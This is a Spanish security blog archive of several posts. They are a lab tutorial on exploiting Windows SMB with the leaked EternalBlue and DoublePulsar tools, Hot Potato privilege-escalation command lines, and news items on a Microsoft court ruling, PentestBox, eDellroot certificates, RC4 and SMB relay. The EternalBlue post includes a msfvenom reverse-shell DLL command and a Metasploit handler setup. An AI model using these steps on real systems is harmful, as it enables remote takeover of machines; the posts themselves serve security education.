Categoría : Windows

Inicio/Herramientas de Seguridad/Archivo por Categoría Windows

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

La histórica sentencia que ganó Microsoft para no tener que entregar tus datos privados a las autoridades

Un tribunal de apelaciones en Estados Unidos determinó que las autoridades nacionales no pueden forzar al gigante de la informática Microsoft a entregarles información contenida en servidores alojados en otros países.

La decisión sienta un precedente histórico en materia de protección de la privacidad para servicios de computación en la nube.

“Deja claro que el gobierno de Estados Unidos no puede utilizar órdenesjudiciales en forma unilateral para llegar a otros países y obtener los correos electrónicos que pertenecen a personas de otras nacionalidades“, le dijo a la BBC Brad Smith, presidente y jefe legal de la compañía.

“Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube”, añadió.

Derechos digitales

El caso llegó a los tribunales después de que Microsoft se negara a otorgarle acceso al Departamento de Justicia a un servidor en Irlanda, como parte de una investigación en un expediente relacionado con drogas. Un tribunal en Manhattan le dio luz verde al Departamento de Justicia en 2014. Pero la corte de apelaciones deshizo esa decisión.

Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube” – Brad Smith, portavoz de Microsoft

El Departamento de Justicia rechazó el fallo e indicó que estaba evaluando el siguiente paso.

Si resuelve apelar, el caso caería en manos de la Corte Suprema de Justicia.

Varias empresas, como Amazon, Apple y Cisco, respaldaron a Microsoft en el caso.

Otra de las organizaciones que estuvo de su lado fue el Open Rigths Group, una ONG en Reino Unido que defiende los derechos digitales.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal”, declaró el director legal del grupo, Myles Jackman.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal” Myles Jackman, Open Rights Group

“En consecuencia, los organismos de seguridad de Estados Unidos deben respetar el derecho a la privacidad digital de los ciudadanos europeos y la protección de sus datos personales“.

“Los Estados no deberían ir más allá de sus fronteras simplemente porque creen que, al hacerlo, pueden amedrentar a las compañías”, añadió.

Juego abierto a todos

Microsoft había advertido que permitir que se ejecutara la orden de judicial desataría un “juego abierto”, en el que otros países podían tratar de implementar órdenes similares para acceder a servidores ubicados en Estados Unidos.

Haciéndose eco de preocupaciones ampliamente extendidas en la industria tecnológica, la empresa sostuvo que, simplemente, las leyes estaban demasiado desactualizadas como para resultar efectivas.

Satya Nadella en una aparición pública en San FranciscoEl jefe de Microsoft, Satya Nadella, ha hecho de la computación en la nube y su seguridad el gran foco de la compañía.

La protección de la privacidad y las necesidades de las autoridades a cargo de hacer cumplir la ley requieren de nuevas soluciones que reflejen el mundo que existe hoy, en vez de tecnologías que existían hace tres décadas, cuando se aprobaron las leyes que están vigentes”, señaló la empresa.

Entre los organismos a cargo de velar por la seguridad, el orden y la legalidad hay una preocupación importante acerca de la posibilidad de que el almacenamiento en la red, junto a la encriptación, esté ofreciendo un espacio en el que los criminales pueden actuar a sus anchas.

Los límites de la cooperación

La juez Susan Carney, a cargo del expediente, falló en contra del Departamento de Justicia sobre la base de que la Ley de Comunicaciones Almacenadas (SAC, por sus siglas en inglés) de 1986 limitaba el alcance de las órdenes judiciales aplicables fuera de Estados Unidos.

La juez señaló que esas restricciones son vitales para mantener buenas relaciones con otros países.

Aun más, dijo que hay mecanismos para la cooperación entre naciones el curso de las investigaciones, aunque las autoridades con frecuencia se quejan de que tomar ese camino es más costoso y consume más tiempo.

Una persona usando una computadora
A las autoridades les preocupa que la nube le proporcione un “espacio seguro” a los criminales para operar.

“Ir a tribunales para pedir una orden bajo la SCA normalmente es más rápido que recurrir a los canales internacionales de resolución”, dijo Daniel Stoller, editor legal senior de la firma Bloomberg Law Privacy & Security News.

Stoller señaló que la sentencia original de 2014 interpretó la SCA de manera que favoreciera la visión del Departamento de Justicia. Pero la apelación le dio prioridad a la legislación internacional.

Otro juez involucrado en el juicio, Gerard Lynch, afirmó que la ley de 1986 necesitaba una actualización urgentemente.

“Estoy de acuerdo con el resultado”, escribió.

“Pero no creo de ninguna manera que el resultado debe ser tomado como algo que se convertirá en política racional, ni mucho menos celebrado como un hito en materia de protección de la privacidad“.

Fuente: BBC

Pentest Box

Uno de los principales problemas al hacer auditorias de seguridad son las herramientas que están disponibles en los diferentes sistemas operativos (Windows, GNU/Linux), uno de los dolores de cabeza es la instalación de paquetes python, ruby, y perl, en sistemas Windows, o el uso de maquinas virtuales (cuando se tiene pocos recursos de CPU y RAM en la maquina).

PENTEST BOX.

Es una herramienta que permite ejecutar herramientas de pentesting en entornos windows a través del  CMD, no tiene que ser instalado y el uso de recursos es mínimo, de esta manera no es necesario el uso de una maquina virtual. Fue creado debido a que más del 50% de los usuarios de distribución de pruebas de penetración utiliza ventanas.Por lo que proporciona una plataforma eficiente para las pruebas de penetración en la plataforma de Windows.

Características que presenta PentestBox.

  • Funciona directamente en Windows de forma nativa, lo que ganaremos en rendimiento.
  • No necesita dependencias, todo esta incorporado en pentestbox.
  • Solo se necesitan 2GB de espacio en disco y 20MB de ram al ejecutar alguna herramienta.
  • Es portable, no es necesario instalarlo se puede llevar en una memoria USB.
  • Tiene soporte para maquinas 32-bits.
  • PentestBox puede ser compartida en una carpeta en la red de trabajo.

Herramientas que incorpora PentestBox

Las herramientas de pentestbox están ordenadas en las siguientes categorías:

  • Escáners de Vulnerabilidades Web
  • Proxies Aplicaciones Web
  • Rastreadores Web
  • Recopilación De Información
  • Herramientas de Explotación
  • Fuerza bruta a las contraseñas
  • Seguridad en Android
  • Ingeniería Inversa
  • Herramientas de Stress
  • Sniffers
  • Herramientas Análisis Forense
  • Ataques y Auditorias Wireless
  • Editores de Texto

Acá pueden ver una demo, en la que pueden observar el funcionamiento de pentestbox y algunas herramientas.

Para poder saber mas sobre esta herramienta dejare los enlaces de descarga y la documentación de pentestbox.

URL’s:

Descarga directa de PentestBox.

Documentación de PentestBox.

 

Hot Potato, un ataque de escalada de privilegios que amenaza a Windows

Aunque tengamos nuestro sistema operativo actualizado con los boletines de seguridad más recientes, eso no significa que nuestro sistema operativo esté totalmente protegido. Windows, por ejemplo, cuenta con una serie de vulnerabilidades conocidas que llevan años afectando al sistema operativo y que no pueden ser solucionadas por Microsoft debido a que, de hacerlo, podrían ocurrir problemas de compatibilidad con protocolos y aplicaciones antiguas. Hot Potato es un nuevo exploit que se aprovecha de estas vulnerabilidades para ganar privilegios dentro de un sistema remoto y ejecutar aplicaciones y comandos en él.

Aunque este fallo de seguridad es un peligro para todos (por ejemplo, un usuario doméstico podría tomar el control del sistema de forma relativamente sencilla incluso teniendo permisos de usuario limitado), donde mayor es su peligro es en entornos corporativos, donde la mayoría de las empresas dependen de los privilegios de las cuentas de Windows para proteger su red corporativa, algo que no debería ser así.

La mayoría de los fallos utilizados en este exploit tienen varios años de antigüedad y son perfectamente conocidos por Microsoft, sin embargo, la compañía no puede solucionarlos ya que, de hacerlo, el sistema operativo y la red perderían compatibilidad con servicios, aplicaciones y protocolos antiguos, algo que no se puede permitir.

Hot Potato, cómo explotar esta vulnerabilidad

El exploit que permite la escalada de privilegios se divide en 3 partes, y cada una de ellas hace uso de un ataque informático bien conocido que llega atormentando a Microsoft durante años:

Parte 1: Suplantación del servidor NBNS

NBNS es un protocolo UDP utilizado para la resolución de nombres de uso común en entornos Windows. Este protocolo se utiliza cuando se intenta acceder a una IP o dominio que no existe ni en el archivo hosts ni en los servidores DNS y simplemente se basa en preguntar a todos los equipos de la red “¿quién es xxx.xxx.xxx.xxx?” y esperar respuesta.

Lo primero que debemos hacer es crear paquetes falsos NBNS para inundar el equipo de destino, o víctima, con falsas solicitudes de manera que no pueda resolver el nombre.

Parte 2: Falso servidor proxy WPAD

Mediante la configuración de un falso servidor WPAD conseguiremos que todo el tráfico se reenvíe a través de nuestro ordenador, pudiendo tomar el control de todos los paquetes que se generan en el sistema de destino. Este cambio, aunque se realice con una cuenta de usuario limitada, afecta por igual a todos los usuarios, incluidos los administradores.

Parte 3: HTTP -> SMB NTLM Relay

Una vez que todo el tráfico ya se reenvía a través del equipo que controlamos, ya podemos empezar a realizar peticiones al equipo de origen con el correspondiente exploit. Este exploit se encarga de redirigir cada una de las solicitudes hasta que, finalmente, se consiguen los paquetes necesarios para la autenticación.

Con ellos, se crea un nuevo servicio en el sistema remoto con permisos “NT AUTHORITY\SYSTEM”, el cual utilizaremos para ejecutar aplicaciones y procesos con permisos totales.

Hot Potato - Exploit para Windows

Lo único que nos queda es ejecutar el exploit. Hot Potato afecta a Windows 7, Windows 8.1, Windows 10 y las versiones Server. Este exploit funciona de forma diferente según el sistema operativo que estemos utilizando. Por ejemplo:

  • En Windows 7 basta con ejecutar el exploit con el comando Potato.exe -ip <local ip> -cmd <command to run> -disable_exhaust true

  • En Windows Server 2008, el comando a ejecutar será: Potato.exe -ip <local ip> -cmd <command to run> -disable_exhaust true -disable_defender true –spoof_host WPAD.EMC.LOCAL

  • En Windows 8.1, 10 y Server 2012 el comando a ejecutar es: Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true

Por el momento estos ataques están limitados a equipos dentro de una red local, sin embargo, los expertos de seguridad responsables del exploit aseguran estar dando los primeros pasos para atacar otros ordenadores a través de Internet.

Explotación y mitigación de Hot Potato en Windows

Los usuarios interesados en probar esta sencilla vulnerabilidad que permite a cualquier usuario no autorizado conseguir los máximos privilegios sobre el sistema pueden hacerlo descargando todo lo necesario desde GitHub.

Aunque hace poco tiempo Microsoft solucionó un fallo similar en su sistema operativo, Hot Potato vuelve a llamar a sus puertas. A falta de un nuevo parche que bloquee este problema de seguridad, los expertos recomiendan activar la opción “Extended Protection for Authentication” y al uso de NTLMv2 y/o Kerberos en Windows para detener, mitigar y bloquear los ataques de relay NTLM.

Fuente: Redes Zone

Microsoft elimina los certificados de confianza eDellroot

A raíz del fiasco de eDellroot la semana pasada, Microsoft anunció el lunes que revocó el apoyo a los certificados de confianza auto firmados que se encuentran en algunos equipos Dell.

En un aviso de seguridad publicado el lunes, la compañía reconoció que con el fin de evitar el fraude, ha eliminado la confianza de los certificados digitales sin restricciones emitidas por Dell y ha actualizado su lista de certificados de confianza (CTL).

La compañía afirma que la medida es de carácter preventivo, ya que es consciente de los ataques relacionados con los certificados actualmente.

La conversación se dio a lugar la semana pasada, poco antes de Acción de Gracias, que varios modelos de ordenadores Dell se entregan con un certificado root preinstalado y la clave privada que corresponde al certificado. Como es de esperar, muchos estaban preocupados ya que los certificados podrían utilizarse para emitir otros certificados falsos, dominios para suplantar contenido y llevar a cabo ataques de phishing o ataques man-in-the-middle.

El certificado eDellroot  fue encontrado en los Dell XPS 15 (ordenadores portátiles), en ordenadores de escritorio M4800 y en ordenadores de escritorios y portátiles Inspiron. Dos certificados adicionales también fueron encontrados en las máquinas de Dell la semana pasada, pero el riesgo ha sido informado como mínimo, debido a que uno estaba caducado y otro solamente existían en dos docenas de máquinas.

Dell dijo la semana pasada que planeaba eliminar el certificado eDellroot de su sistemas. La compañía también proporciona instrucciones de eliminación para los afectados e introdujo una actualización de software para localizar el certificado y retirarlo.

Microsoft señala a través de su asesor que  prácticamente cada versión de Windows incluye un CTL que se actualiza automáticamente, por lo que la mayoría de los usuarios no tendrán que tomar las medidas cautelares para asegurarse que están protegidos.

Fuente: ThreatPost

Google, Mozilla y Microsoft planean cortar su apoyo a RC4 a principios de 2016

Google, Microsoft y Mozilla anunciaron el día de hoy que retiraran su apoyo de manera permanente al algoritmo RC4, ya que el mismo es inestable.

Ataques prácticos contra RC4 están creciendo cada vez más, lo que hace el algoritmo cada vez menos confiable. Los fabricantes de los navegadores planean cortar el apoyo a RC4 a finales de enero, principios de febrero el 2016.

Por parte de Mozilla, Richard Barnes dijo que la fecha de cierre debe coincidir con el lanzamiento de Firefox versión 44, programada para el 26 de enero, por parte de Google, Adam Langley dijo que Chrome alcanzará un canal estable en enero o febrero, pero no especificó una fecha, sólo que los servidores que requieran RC4 dejaran de funcionar.

“La Desactivación RC4 significará que Firefox ya no se conectará con servidores que requieren RC4”, dijo Barnes en un post en el foro de la plataforma de desarrolladores de Mozilla.

Langley escribió al security@chromium.org un correo que dice: “Cuando Chrome realiza una conexión HTTPS tiene un deber implícito de hacer todo lo posible para garantizar que la conexión sea segura. En este punto, el uso de RC4 en una conexión HTTPS está siendo inseguro y por lo tanto tenemos la intención de desactivar el soporte para RC4 en un comunicado a futuro”.

Actualmente, Firefox Beta y versiones de lanzamiento no restringen RC4, pero sin embargo, sólo el 0,05 por ciento y 0,08 por ciento de las conexiones a las versiones respectivas utilizan RC4. Los números de Google son un poco más alto para Chrome, un 0,13 por ciento.

Microsoft ha anunciado fin de la vida de RC4 en Microsoft Edge e Internet Explorer 11, y que será desactivado por defecto.

“Microsoft Edge e Internet Explorer 11 sólo se utiliza RC4 durante un repliegue de TLS 1.2 o 1.1 de TLS 1.0. Un retorno a TLS 1.0 con RC4 es más a menudo el resultado de un error inocente, pero esto es indistinguible de un ataque man-in-the-middle “, dijo David Walp, Senior Program Manager, Microsoft Edge. “Por esta razón, RC4 se desactivará enteramente por defecto para todos los usuarios de Microsoft Edge e Internet Explorer en Windows 7, Windows 8.1 y Windows 10 a partir de principios de 2016.”

Durante más de una década, los investigadores han estado haciendo agujeros en RC4, la búsqueda de sesgos en bytes no tan al azar del cifrado de flujo se utilizan para cifrar texto plano. Un atacante con suficiente tiempo y poder de procesamiento y el acceso a suficientes solicitudes TLS podría averiguar todo el texto plano.

En 2013, la investigación realizada por la Universidad de Illinois ‘Daniel J. Bernstein logro un ataque práctico contra una debilidad conocida en RC4 que conduce a una sesión de compromiso TLS, uno de los primeros ataques factibles que se han hecho públicos.

En julio, los investigadores belgas publicaron ataques contra RC4 que permite a un hacker capturar y descifrar una cookie mucho más rápido que nunca.

El documento “Todos sus prejuicios nos pertenece: Rompiendo RC4 en WPA-TKIP y TLS”, escrita por Mathy Vanhoef y Frank Piessens de la Universidad de Lovaina, explica el descubrimiento de nuevas tendencias en el algoritmo que llevó a los atacante a romper el cifrado en los sitios web corriendo TLS con RC4, así como el WPA-TKIP.

Vanhoef y Piessens explican cómo un atacante puede utilizar estos resultados para descifrar las cookies de un usuario, por ejemplo, que debe ser asegurada sobre un canal cifrado. Sus ataques, sin embargo, no se limitan a las cookies.

“Esto significa que el atacante puede realizar acciones bajo el nombre de la víctima (por ejemplo, enviar actualizaciones de estado y enviar mensajes), tener acceso a la información personal (por ejemplo, a los correos electrónicos y el historial de chat), y así sucesivamente”, dijeron los académicos

Fuente: Threat Post

Vulnerabilidad en SMB en Windows permite robo de credenciales

En la Conferencia Black Hat, un equipo de expertos liderado por Jonathan Brossard presentaron una vulnerabilidad en el protocolo SMB de Microsoft [PDF] utilizado para compartir archivos en redes locales. La vulnerabilidad afecta a todas las versiones de Windows, incluyendo Windows 10 y puede ser explotada a través de Internet, algo que los investigadores creían imposible.

SMB es un protocolo de 21 años de edad creado por IBM, que permite compartir archivos e impresoras en una red. Desde su creación, ha evolucionado y llegado a la versión 3.0, que se suministra ahora en la mayoría de los Windows. La mayoría de las veces este protocolo se utiliza en redes empresariales, junto al algoritmo de autenticación NTLMv2, que permite a los usuarios autentificarse rápidamente en servidores Windows.

La vulnerabilidad descubierta por el equipo de Brossard permite extraer las credenciales de usuario desde un dominio de Windows cerrado, utilizando una técnica de ataque llamada SMB Relay, basicamente un MitM para datos SMB. Mientras esta técnica generalmente trabajaba sólo en LAN, debido a que la mayoría de redes empresariales se han ampliado para incluir infraestructuras cloud, el ataque puede realizarse a través de conexiones a Internet.

La fuga de credenciales sucede cuando un usuario está tratando de leer un correo electrónico, acceder a una página Web utilizando el navegador o haciendo cualquier cosa que implique abrir una dirección URL. La vulnerabilidad se encuentra en una DLL específica que permite a un atacante realizar un ataque de retransmisión SMB, obtener las credenciales del usuario, romper el hash de la contraseña y luego utilizarlas para robar información de la red pasando como un usuario normal.

Como señala Brossard, todas las versiones de IE son vulnerables, incluyendo el nuevo navegador Edge, siendo este “el primer ataque contra Windows 10 y su navegador Spartan”.

Además, otras aplicaciones vulnerables incluyen Windows Media Player, Adobe Reader, Apple QuickTime, Excel 2010, Symantec Norton Security Scan, AVG Free, BitDefender Free Comodo Antivirus, IntelliJ IDEA, Box Sync, GitHub, TeamViewer, Dropbox y muchas otros aplicaciones.

La investigación también incluye técnicas de mitigación [PDF], pero según Brossard, el más eficiente sería definir configuraciones de Firewall personalizados, para prevenir fugas de datos a través de SMB.

Fuente: Segu.Info